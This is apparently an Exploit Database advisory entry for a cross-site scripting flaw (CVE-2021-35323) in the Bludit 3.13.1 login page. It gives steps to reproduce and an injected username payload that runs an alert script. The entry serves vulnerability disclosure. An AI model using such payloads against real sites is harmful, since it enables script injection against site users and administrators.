Bludit 3.13.1 – ‘username’ Cross Site Scripting (XSS)

• Exploit Database
• 120 阅读

• 作者： Vasu
  日期： 2021-11-17
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/50529/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15

  # Exploit Title: Bludit 3.13.1 - &apos;username&apos; Cross Site Scripting (XSS) # Date: 19/10/2021 # Exploit Author: Vasu (tamilan_mkv) # Vendor Homepage: https://www.bludit.com # Software Link: https://www.bludit.com/releases/bludit-3-13-1.zip # Version: bludit-3-13-1 # Tested on: kali linux # CVE : CVE-2021-35323   ### Steps to reproduce   1. Open login page http://localhost:800/admin/login; 2. Enter the username place <code></code>admin"><img src=x onerror=alert(1)><code></code>and enter the password 3. Trigger the malicious javascript code